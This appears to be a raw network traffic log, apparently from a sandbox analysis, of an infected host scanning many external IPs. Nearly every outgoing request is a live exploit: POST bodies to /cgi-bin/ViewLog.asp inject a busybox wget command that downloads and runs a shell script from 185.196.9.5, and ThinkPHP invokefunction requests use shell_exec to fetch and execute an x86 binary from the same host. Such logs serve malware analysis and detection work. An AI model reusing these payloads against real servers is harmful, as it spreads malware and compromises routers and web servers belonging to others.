Feb 25, 2024 19:03:06.566106081 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:08.774127007 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:13.382072926 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:22.342031956 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:41.029927015 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:17.893479109 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
237	192.168.2.15	43568	31.136.189.240	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.873143911 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:05.446136951 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:06.566113949 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:08.774116039 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:13.382056952 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:22.342169046 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:41.029926062 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:17.893487930 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
238	192.168.2.15	35994	31.136.147.202	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.873378992 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:05.446135044 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:06.566143990 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:08.774099112 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:13.382072926 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:22.342031956 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:41.029927015 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:17.893479109 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
239	192.168.2.15	36982	95.144.131.146	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.896217108 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
240	192.168.2.15	52108	95.101.111.40	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.905320883 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:05.109571934 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:03:04 GMT Date: Sun, 25 Feb 2024 18:03:04 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 38 34 36 37 62 35 63 26 23 34 36 3b 31 37 30 38 38 38 34 31 38 34 26 23 34 36 3b 39 30 34 36 38 39 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.28467b5c.1708884184.9046893</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
241	192.168.2.15	35992	95.213.226.7	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.913935900 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:05.126326084 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:03:05 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
242	192.168.2.15	48128	94.121.153.224	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.934665918 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
243	192.168.2.15	55942	95.0.0.250	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.936110973 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:05.172254086 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.22.1 Date: Sun, 25 Feb 2024 18:03:05 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
244	192.168.2.15	43834	94.121.114.83	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.969789028 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
245	192.168.2.15	52902	94.121.42.219	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:04.969902039 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
246	192.168.2.15	60216	95.111.201.226	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:05.038247108 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:05.374757051 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:03:04 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
247	192.168.2.15	43302	95.101.237.182	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:05.279016972 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:05.523943901 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:05 GMT Date: Sun, 25 Feb 2024 18:03:05 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 36 65 64 36 35 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 31 38 35 26 23 34 36 3b 32 35 38 30 31 34 65 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b6ed655f.1708884185.258014e8</BODY></HTML>

